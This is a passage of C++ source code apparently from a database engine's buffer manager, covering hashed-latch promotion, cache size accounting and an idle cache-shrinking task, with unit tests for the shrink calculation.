JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s in slot %d demoted (%.2f percent %d)",
OSFormatPointer( pbfLoser ),
(ULONG)iHashedLatchLoser,
100.0 * dcReqHashedLatchSumLoser / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
dcReqHashedLatchSumLoser ) );
}
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s promoted to slot %d (%.2f percent %d %.2f percent)",
OSFormatPointer( pbfElect ),
(ULONG)iHashedLatchLoser,
100.0 * rgdcReqNomineeSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
rgdcReqNomineeSum[ 0 ],
100.0 * rgdcReqNomineeMax[ 0 ] / rgdcReqNomineeSum[ 0 ] ) );
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "Hashed Latch Summary:\r\n"
"---------------------\r\n"
" 0 %.2f percent\r\n"
" 1 %.2f percent\r\n"
" 2 %.2f percent\r\n"
" 3 %.2f percent\r\n"
" 4 %.2f percent\r\n"
" 5 %.2f percent\r\n"
" 6 %.2f percent\r\n"
" 7 %.2f percent\r\n"
" 8 %.2f percent\r\n"
" 9 %.2f percent\r\n"
"10 %.2f percent\r\n"
"11 %.2f percent\r\n"
"12 %.2f percent\r\n"
"13 %.2f percent\r\n"
"14 %.2f percent\r\n"
"15 %.2f percent\r\n"
"Total %.2f percent",
100.0 * rgdcReqHashedLatchSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 1 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 2 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 3 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 4 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 5 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 6 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 7 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 8 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 9 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 10 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 11 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 12 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 13 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 14 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 15 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * dcReqHashedLatchTotal / ( g_dcReqSystem ? g_dcReqSystem : 100 ) ) );
}
if ( pbfLoser != pbfNil )
{
pbfLoser->sxwl.ReleaseExclusiveLatch();
}
}
pbfElect->sxwl.ReleaseExclusiveLatch();
}
}
// if there was a nominee elect and we decided not to promote it then
// strip it of its nominee elect status and make it ineligible for
// nomination for a while
else if ( pbfElect != pbfNil )
{
Assert( pbfElect->bfat == bfatFracCommit );
if ( pbfElect->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
BFNominee* const pbfn = &Ppls( iProc )->rgBFNominee[ 0 ];
pbfn->pbf = pbfNil;
}
pbfElect->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() + dtickPromotionDenied );
pbfElect->bfls = bflsNormal;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s denied promotion (%.2f percent %d %.2f percent %d)",
OSFormatPointer( pbfElect ),
100.0 * rgdcReqNomineeSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
rgdcReqNomineeSum[ 0 ],
100.0 * rgdcReqNomineeMax[ 0 ] / rgdcReqNomineeSum[ 0 ],
dcReqHashedLatchSumLoser ) );
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "Hashed Latch Summary:\r\n"
"---------------------\r\n"
" 0 %.2f percent\r\n"
" 1 %.2f percent\r\n"
" 2 %.2f percent\r\n"
" 3 %.2f percent\r\n"
" 4 %.2f percent\r\n"
" 5 %.2f percent\r\n"
" 6 %.2f percent\r\n"
" 7 %.2f percent\r\n"
" 8 %.2f percent\r\n"
" 9 %.2f percent\r\n"
"10 %.2f percent\r\n"
"11 %.2f percent\r\n"
"12 %.2f percent\r\n"
"13 %.2f percent\r\n"
"14 %.2f percent\r\n"
"15 %.2f percent\r\n"
"Total %.2f percent",
100.0 * rgdcReqHashedLatchSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 1 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 2 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 3 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 4 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 5 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 6 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 7 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 8 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 9 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 10 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 11 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 12 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 13 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 14 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 15 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * dcReqHashedLatchTotal / ( g_dcReqSystem ? g_dcReqSystem : 100 ) ) );
pbfElect->sxwl.ReleaseExclusiveLatch();
}
}
// if there is no nominee elect and there is a winning nominee then make
// it the new nominee elect
pbfWinner = Ppls( 0 )->rgBFNominee[ iNomineeWinner ].pbf;
if ( Ppls( 0 )->rgBFNominee[ 0 ].pbf == pbfNil && pbfWinner != pbfNil )
{
if ( pbfWinner->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( cProc - 1 - iProc );
ppls->rgBFNominee[ iNomineeWinner ].pbf = pbfNil;
ppls->rgBFNominee[ 0 ].pbf = pbfWinner;
}
pbfWinner->bfls = bflsElect;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s in slot %d elected (%d %.2f percent)",
OSFormatPointer( pbfWinner ),
(ULONG)iNomineeWinner,
rgdcReqNomineeSum[ iNomineeWinner ],
100.0 * rgdcReqNomineeMax[ iNomineeWinner ] / rgdcReqNomineeSum[ iNomineeWinner ] ) );
pbfWinner->sxwl.ReleaseExclusiveLatch();
}
}
// purge the losing nominees so that new BFs can try for a hashed latch.
// also prevent the losers from being nominated again for a while to help
// give those BFs a chance to get in
for ( iNominee = 1; iNominee < cBFNominee; iNominee++ )
{
if ( iNominee != iNomineeWinner )
{
const PBF pbfNominee = Ppls( 0 )->rgBFNominee[ iNominee ].pbf;
if ( pbfNominee != pbfNil &&
pbfNominee->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( cProc - 1 - iProc );
ppls->rgBFNominee[ iNominee ].pbf = pbfNil;
}
pbfNominee->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() + dtickLosingNominee );
pbfNominee->bfls = bflsNormal;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s in slot %d purged (%d %.2f percent)",
OSFormatPointer( pbfNominee ),
(ULONG)iNominee,
rgdcReqNomineeSum[ iNominee ],
100.0 * rgdcReqNomineeMax[ iNominee ] / rgdcReqNomineeSum[ iNominee ] ) );
pbfNominee->sxwl.ReleaseExclusiveLatch();
}
}
}
}
#endif // MINIMAL_FUNCTIONALITY
// Cache Size
CSemaphore g_semMaintCacheStatsRequest( CSyncBasicInfo( _T( "g_semMaintCacheStatsRequest" ) ) );
CSemaphore g_semMaintCacheSize( CSyncBasicInfo( _T( "g_semMaintCacheSize" ) ) );
LONG g_cMaintCacheSizePending = 0;
inline ICBPage IcbBFIBufferSize( __in const INT cbSize )
{
for( ICBPage icbBuffer = icbPageSmallest; icbBuffer < icbPageMax; icbBuffer++ )
{
if ( cbSize <= g_rgcbPageSize[icbBuffer] )
{
return icbBuffer;
}
}
return icbPageInvalid;
}
inline _Ret_range_( icbPageInvalid, icbPageBiggest ) ICBPage IcbBFIPageSize( __in const INT cbSize )
{
switch( cbSize )
{
case (4*1024):
return icbPage4KB;
case (8*1024):
return icbPage8KB;
case (16*1024):
return icbPage16KB;
case (32*1024):
return icbPage32KB;
}
AssertSz( fFalse, "Invalid page size request (cb = %d)", cbSize );
return icbPageInvalid;
}
INLINE __int64 CbBFICacheUsed( const BOOL fFullyHydrated )
{
__int64 cb = 0;
INT icbPage = icbPageSmallest;
INT icbCacheMaxT = g_icbCacheMax;
// we are using a reference here to avoid duplicating the loop
// depending on the state of fFullyHydrated. If it is true, we'll
// use icbCacheMaxT, which is a constant (equals to g_icbCacheMax),
// otherwise, we'll use icbPage, which is the iteration variable
// so the actual value will get updated on each iteration.
INT& icbPageT = fFullyHydrated ? icbCacheMaxT : icbPage;
for( ;icbPage <= g_icbCacheMax; icbPage++ )
{
cb += ( (__int64)g_rgcbfCachePages[icbPage] * (__int64)g_rgcbPageSize[icbPageT] );
}
Assert( g_rgcbfCachePages[icbPageInvalid] == 0 );
return cb;
}
// Used cache (i.e., !Available).
INLINE CBF CbfBFICacheUsed()
{
CBF cbf = 0;
for( INT icbPage = icbPageSmallest; icbPage <= g_icbCacheMax; icbPage++ )
{
cbf += g_rgcbfCachePages[icbPage];
}
Assert( g_rgcbfCachePages[icbPageInvalid] == 0 );
return cbf;
}
// Resources actually consumed by this buffer manager. If ViewCache is on, we don't need to count available
// buffers.
__int64 CbBFICacheBufferSize()
{
if ( g_fBFInitialized )
{
return CbBFICacheIMemoryCommitted();
}
return 0;
}
// Committed cache: used + available, not including quiesced buffers if decommited (i.e., if running with 2KB pages or
// with view-cache enabled, quiesced buffers will be counted in because they do not get decommitted).
INLINE CBF CbfBFICacheCommitted()
{
const CBF cbfCommittedT = (CBF)g_cbfCommitted - (CBF)g_cbfNewlyCommitted;
if ( cbfCommittedT < 0 )
{
return 0;
}
return cbfCommittedT;
}
// Used cache size (i.e., !Available) considering actual hydration state.
__int64 CbBFICacheSizeUsedDehydrated()
{
return CbBFICacheUsed( fFalse );
}
// Used cache size (i.e., !Available) not considering actual hydration state, so it's the theoretical cache size
// if all the pages were fully hydrated.
__int64 CbBFICacheISizeUsedHydrated()
{
return CbBFICacheUsed( fTrue );
}
__int64 CbBFICacheIMemoryReserved()
{
return g_cbCacheReservedSize;
}
__int64 CbBFICacheIMemoryCommitted()
{
return g_cbCacheCommittedSize;
}
// Average size of a buffer.
__int64 CbBFIAveResourceSize()
{
if ( g_fBFInitialized )
{
const __int64 cbCacheSizeUsedDehydrated = CbBFICacheSizeUsedDehydrated();
const CBF cbfCacheSizeUsed = CbfBFICacheUsed();
// if no buffers, have to fake it with something.
if ( cbCacheSizeUsedDehydrated > 0 && cbfCacheSizeUsed > 0 && cbCacheSizeUsedDehydrated >= cbfCacheSizeUsed )
{
return cbCacheSizeUsedDehydrated / cbfCacheSizeUsed;
}
else
{
return g_rgcbPageSize[g_icbCacheMax];
}
}
return 0;
}
// Number of "credit-buffers" we are getting for dehydrating pages.
LONG_PTR CbfBFICredit()
{
if ( g_fBFInitialized )
{
const __int64 cbCacheSizeUsedHydrated = CbBFICacheISizeUsedHydrated();
const __int64 cbCacheSizeUsedDehydrated = CbBFICacheSizeUsedDehydrated();
// if we have 100% of the cache in a hydrated state, this can be negative for a brief period of
// time because both are updated non-atomically and we don't want to rely on the order of the
// updates, so let's be safe.
if ( cbCacheSizeUsedHydrated > cbCacheSizeUsedDehydrated )
{
return (LONG_PTR)( ( cbCacheSizeUsedHydrated - cbCacheSizeUsedDehydrated ) / g_rgcbPageSize[g_icbCacheMax] );
}
}
return 0;
}
// Averaged number of "credit-buffers" we are getting for dehydrating pages.
LONG_PTR CbfBFIAveCredit()
{
return g_avgCbfCredit.GetAverage();
}
BOOL FBFIMaintCacheSizeQuiescedInSensitivityRange()
{
if ( cbfCacheTarget > g_cbfCacheTargetOptimal )
{
return fFalse;
}
ULONG_PTR cbfCacheStable = 0;
ULONG_PTR cbfCacheStableNew = 0;
const ULONG_PTR cbfBFIAveCredit = (ULONG_PTR)CbfBFIAveCredit();
const ULONG_PTR cbfBFICredit = (ULONG_PTR)CbfBFICredit();
if ( FBFICacheSizeFixed() )
{
const ULONG_PTR cbfCacheTargetEffective = g_cbfCacheUserOverride ? g_cbfCacheUserOverride : UlParam( JET_paramCacheSizeMin );
cbfCacheStable = cbfCacheTargetEffective + cbfBFIAveCredit;
cbfCacheStableNew = cbfCacheTargetEffective + cbfBFICredit;
}
else
{
cbfCacheStable = cbfCacheTarget;
cbfCacheStableNew = cbfCacheStable + cbfBFICredit;
cbfCacheStableNew -= min( cbfCacheStableNew, cbfBFIAveCredit );
}
// Even if the cache size has reached its goal (i.e., cbfCacheSize == cbfCacheStable), there's
// still a chance that dehadrations/re-hydrations are changing the amount of credit buffers
// in a measurable way, that's why we are still going to test for FBFICacheApproximatelyEqual()
// below.
if ( (ULONG_PTR)cbfCacheSize == cbfCacheStable )
{
return FBFICacheApproximatelyEqual( cbfCacheStableNew, cbfCacheStable );
}
return fFalse;
}
LOCAL ULONG g_cMaintCacheSizeReqAcquireFailures = 0;
#ifndef RTM
TICK g_tickMaintCacheStatsResizeLastAttempt = 0;
LONG_PTR g_cbfMaintCacheStatsResizeLastAttempt = 0;
TICK g_tickMaintCacheStatsResizeLast = 0;
LONG_PTR g_cbfMaintCacheStatsResizeLast = 0;
#endif // !RTM
TICK g_tickLastLowMemoryCallback = 0;
#define fIdleCacheStatTask (VOID *)1
void BFIMaintLowMemoryCallback( DWORD_PTR pvUnused )
{
// start DBA - which will take care of shrinking cache if needed
// Can only fail if we are already in the middle of shutdown
g_tickLastLowMemoryCallback = TickOSTimeCurrent();
ErrBFIMaintCacheStatsRequest( bfmcsrtForce );
}
void BFICacheSizeBoost()
{
if ( FBFICacheSizeFixed() )
{
return;
}
const size_t cbAvailOsMem = g_cacheram.AvailablePhysicalMemory();
const size_t cbRam = g_cacheram.TotalPhysicalMemory();
// short circuit boost if it looks irrational to run it.
if ( ( cbAvailOsMem < ( cbRam / 10 ) ) && // avail OS memory "low" ... < 10% RAM
( ( (size_t)cbfCacheSize * (size_t)g_rgcbPageSize[g_icbCacheMax] ) > ( cbRam / 10 ) ) ) // our own cache is not 10% of total memory
{
return;
}
if ( ( cbAvailOsMem < ( cbRam / 20 ) ) ) // avail OS memory "super low" ... < 5% RAM
{
return;
}
g_critCacheSizeSetTarget.Enter();
ULONG_PTR cbfRealCacheSize;
LONG_PTR cbBoost;
CallS( ErrBFGetCacheSize( &cbfRealCacheSize ) );
cbBoost = min( ( cbfAvailPoolHigh - (LONG_PTR)g_bfavail.Cobject() ) * g_rgcbPageSize[g_icbCacheMax],
(LONG_PTR)cbAvailOsMem / 2 );
if ( cbfRealCacheSize >= UlParam( JET_paramCacheSizeMax ) ||
cbBoost <= 0 )
{
g_critCacheSizeSetTarget.Leave();
return;
}
g_cCacheBoosts++;
g_cbCacheBoosted += cbBoost;
g_cacheram.OverrideResourceAdjustments( (double)cbBoost );
g_cacheram.SetOptimalResourcePoolSize(); // note: this calls g_cacheram.ConsumeResourceAdjustments()
g_critCacheSizeSetTarget.Leave();
OnDebug( BOOL fAcquiredSemaphore = fFalse );
// Disable cleanup checking
// The boost is an optimization, cache sizing in the background will still try to achieve the correct cache size.
// So allocations in this path do not need to be checked for cleanup path checking.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
(void)ErrBFIMaintCacheSizeRequest( OnDebug( &fAcquiredSemaphore ) );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
LOCAL void BFIMaintIdleCacheStatsSchedule()
{
// This is the catch-all task that runs infrequently to handle cases where
// we've quiesced all the cache sizing tasks, but external factors changed
// significantly and would require us to re-evaluate our optimal size calculation
// This might go off from ErrBFICacheInit(), which gets called before ErrBFIMaintInit(),
// so we need to check for its initialization state.
Expected( ( g_posttBFIMaintIdleCacheStatsITask != NULL ) || !g_fBFInitialized );
if ( g_posttBFIMaintIdleCacheStatsITask != NULL )
{
(void)ErrBFIMaintScheduleTask( g_posttBFIMaintIdleCacheStatsITask, NULL, dtickIdleCacheStatsPeriod, dtickIdleCacheStatsSlop );
}
}
#ifndef ENABLE_JET_UNIT_TEST
LOCAL INLINE BOOL FBFICleanBuffer( const IBF ibf )
{
if ( ( ibf < cbfInit ) && !FBFIIsCleanEnoughForEvict( PbfBFICacheIbf( ibf ) ) )
{
return fFalse;
}
return fTrue;
}
#else // ENABLE_JET_UNIT_TEST
LOCAL BOOL g_fSimulateDirtyCache = fFalse;
LOCAL BOOL FBFICleanBuffer( const IBF ibf )
{
if ( g_fSimulateDirtyCache && ( ( ibf % 2 ) == 0 ) )
{
return fFalse;
}
return fTrue;
}
#endif // !ENABLE_JET_UNIT_TEST
LOCAL LONG_PTR CbfBFIMaintIdleCacheStatsWithdrawal(
const LONG_PTR cbfTargetCacheSizeCurrent,
const LONG_PTR cbfTargetCacheSizeMin,
const LONG_PTR dcbfLastWithdrawalThreshold,
BOOL* const pfTooManyUncleanPages )
{
Expected( cbfTargetCacheSizeCurrent >= 0 );
Expected( cbfTargetCacheSizeMin >= 0 );
Expected( dcbfLastWithdrawalThreshold > 0 );
Assert( pfTooManyUncleanPages != NULL );
// Shrink halfway down to the preferred min. cache size.
// If we get to a certain threshold above min, shrink all the way down.
LONG_PTR cbfTargetCacheSizeNew = cbfTargetCacheSizeMin + ( cbfTargetCacheSizeCurrent - cbfTargetCacheSizeMin ) / 2;
if ( cbfTargetCacheSizeNew <= ( cbfTargetCacheSizeMin + dcbfLastWithdrawalThreshold ) )
{
cbfTargetCacheSizeNew = cbfTargetCacheSizeMin;
}
*pfTooManyUncleanPages = fFalse;
CPG cbfUnclean = 0;
for ( IBF ibf = cbfTargetCacheSizeCurrent - 1; ibf >= cbfTargetCacheSizeNew; ibf-- )
{
if ( FBFICleanBuffer( ibf ) )
{
continue;
}
if ( ++cbfUnclean > cbfIdleCacheUncleanThreshold )
{
*pfTooManyUncleanPages = fTrue;
cbfTargetCacheSizeNew = ibf + 1;
break;
}
}
return cbfTargetCacheSizeNew;
}
void BFIMaintIdleCacheStatsITask( VOID *pvGroupContext, VOID * )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
// Quiesce the task immediately if the cache is fixes and we're within the desired range.
if ( FBFIMaintCacheSizeQuiescedInSensitivityRange() && FBFICacheSizeFixed() )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: quiesced due to fixed cache size within sensitivity range.", __FUNCTION__ ) );
return;
}
// If not low-memory or low-power profiles, do not bother trying to quiesce
// this task, just update statistics and reschedule it.
if ( !FJetConfigLowMemory() && !FJetConfigLowPower() )
{
if ( FBFIMaintCacheStatsTryAcquire() )
{
BFIMaintCacheStatsITask( pvGroupContext, fIdleCacheStatTask );
BFIMaintCacheStatsRelease();
}
goto Reschedule;
}
// If the cache is not fixed and quiesced, and we're running on low-memory or low-power profiles,
// do not bother updating statistics: always try to aggressively shrink the cache so we can quiesce
// this task.
g_critCacheSizeSetTarget.Enter();
// Calculate how much to shrink. Take cbfCacheDeadlock into account when determining the min.
// That variable does not account for credit buffers, but that should not impact the final result
// of our calculation significantly: we're choosing to call it quiesced if we get to cbfCacheDeadlock
// to avoid further flushing and less likelihood of not quiescing this and the cache resizing task.
// The new size calculation also returns whether or not we have decided to limit shrinkage due to too
// many unclean pages, which can potentially cause a flush storm. We'll decide not to quiesce the task
// that happens.
BOOL fTooManyUncleanPages = fFalse;
const LONG cbPageSize = g_rgcbPageSize[g_icbCacheMax];
const LONG_PTR cbfTargetCacheSizeCurrent = (LONG_PTR)( g_cacheram.GetOptimalResourcePoolSize() / cbPageSize );
const LONG_PTR cbfTargetCacheSizeMin = (LONG_PTR)( max( max( UlParam( JET_paramCacheSizeMin ), (ULONG_PTR)cbfCacheMinMin ), (ULONG_PTR)cbfCacheDeadlock ) );
const LONG_PTR dcbfLastWithdrawalThreshold = dcbIdleCacheLastWithdrawalThreshold / cbPageSize;
const LONG_PTR cbfTargetCacheSizeNew = CbfBFIMaintIdleCacheStatsWithdrawal( cbfTargetCacheSizeCurrent, cbfTargetCacheSizeMin, dcbfLastWithdrawalThreshold, &fTooManyUncleanPages );
const LONG_PTR dcbfCacheSize = cbfTargetCacheSizeNew - cbfTargetCacheSizeCurrent;
OSTrace(
JET_tracetagBufferManagerMaintTasks,
OSFormat(
"%s: cache sizing from %Id to %Id buffers (min. size is %Id buffers, too-many-unclean is %d).",
__FUNCTION__,
cbfTargetCacheSizeCurrent,
cbfTargetCacheSizeNew,
cbfTargetCacheSizeMin,
fTooManyUncleanPages ) );
AssertSz( !fTooManyUncleanPages || ( dcbfCacheSize <= -cbfIdleCacheUncleanThreshold ),
"We must only have limited shrinkage if we are shrinking by more than the unclean threshold." );
// Quiesce the task if we can't shrink further.
if ( dcbfCacheSize >= 0 )
{
Assert( !fTooManyUncleanPages );
g_critCacheSizeSetTarget.Leave();
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: quiesced due to non-negative cache size change.", __FUNCTION__ ) );
return;
}
// Override set-point (may cause resizing task to kick-off).
g_cacheram.OverrideResourceAdjustments( (double)( dcbfCacheSize * g_rgcbPageSize[g_icbCacheMax] ) );
g_cacheram.SetOptimalResourcePoolSize(); // note: this calls g_cacheram.ConsumeResourceAdjustments()
// The cache size might have concurrently fallen into the sensitivity range while we were setting the new target.
// Do not quiesce yet if we limited shrinkage.
if ( FBFIMaintCacheSizeQuiescedInSensitivityRange() && !fTooManyUncleanPages )
{
g_critCacheSizeSetTarget.Leave();
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: quiesced due to variable cache size within sensitivity range.", __FUNCTION__ ) );
return;
}
g_critCacheSizeSetTarget.Leave();
// Finally, move on to request cache resizing and reschedule itself.
#ifdef DEBUG
if ( dtickIdleCacheStatsPeriod >= 60 * 1000 )
{
const TICK dtickLastCacheStatsRequest = DtickDelta( g_tickLastCacheStatsRequest, TickOSTimeCurrent() );
AssertSz(
( dtickLastCacheStatsRequest >= ( dtickIdleCacheStatsPeriod / 2 ) ) || // Can't be too recent.
( dtickLastCacheStatsRequest <= 1 * 1000 ), // To cover a tiny window where we could be just coming out of idle.
"Last active cache request was too recent (%u msec ago).", dtickLastCacheStatsRequest );
}
#endif // !DEBUG
OnDebug( BOOL fAcquiredSemaphore = fFalse );
// Disable cleanup checking. If we fail on any cleanup codepath, the next
// run of this task will try and makes things right again.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
(void)ErrBFIMaintCacheSizeRequest( OnDebug( &fAcquiredSemaphore ) );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
Reschedule:
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: rescheduled.", __FUNCTION__ ) );
BFIMaintIdleCacheStatsSchedule();
return;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalBasic )
{
// Start with 200 pages, min. is 10, threshold to shrink to min. is 22 (12 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 200, 10, 12, &fTooManyUncleanPages ) == 105 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 105, 10, 12, &fTooManyUncleanPages ) == 57 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 57, 10, 12, &fTooManyUncleanPages ) == 33 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 33, 10, 12, &fTooManyUncleanPages ) == 10 ); // All the way down to min.
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalBasicDirty )
{
// Start with 200 pages, min. is 10, threshold to shrink to min. is 22 (12 above min).
g_fSimulateDirtyCache = fTrue;
BOOL fTooManyUncleanPages = fFalse;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 200, 10, 12, &fTooManyUncleanPages ) == 159 );
CHECK( fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 159, 10, 12, &fTooManyUncleanPages ) == 119 );
CHECK( fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 119, 10, 12, &fTooManyUncleanPages ) == 79 );
CHECK( fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 79, 10, 12, &fTooManyUncleanPages ) == 44 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 44, 10, 12, &fTooManyUncleanPages ) == 27 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 27, 10, 12, &fTooManyUncleanPages ) == 10 ); // All the way down to min.
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalAlreadyQuiesced )
{
// Start with 100 pages, min. is also 100, variable thresholds.
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 100, 1, &fTooManyUncleanPages ) == 100 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 100, 50, &fTooManyUncleanPages ) == 100 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 100, 100, &fTooManyUncleanPages ) == 100 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalCurrentBelowMin )
{
// Start with 100 pages, min. is 110.
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 110, 1, &fTooManyUncleanPages ) == 110 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 110, 10, &fTooManyUncleanPages ) == 110 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 110, 50, &fTooManyUncleanPages ) == 110 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalStartBelowThreshold )
{
// Start with 100 pages, min. is 10, threshold to shrink to min. is 110 (100 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 10, 100, &fTooManyUncleanPages ) == 10 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalQuiesceOnFirst )
{
// Start with 100 pages, min. is 50, threshold to shrink to min. is 75 (25 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 50, 25, &fTooManyUncleanPages ) == 50 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalQuiesceOnSecond )
{
// Start with 100 pages, min. is 50, threshold to shrink to min. is 74 (24 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 50, 24, &fTooManyUncleanPages ) == 75 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 75, 50, 24, &fTooManyUncleanPages ) == 50 );
CHECK( !fTooManyUncleanPages );
}
#endif // ENABLE_JET_UNIT_TEST
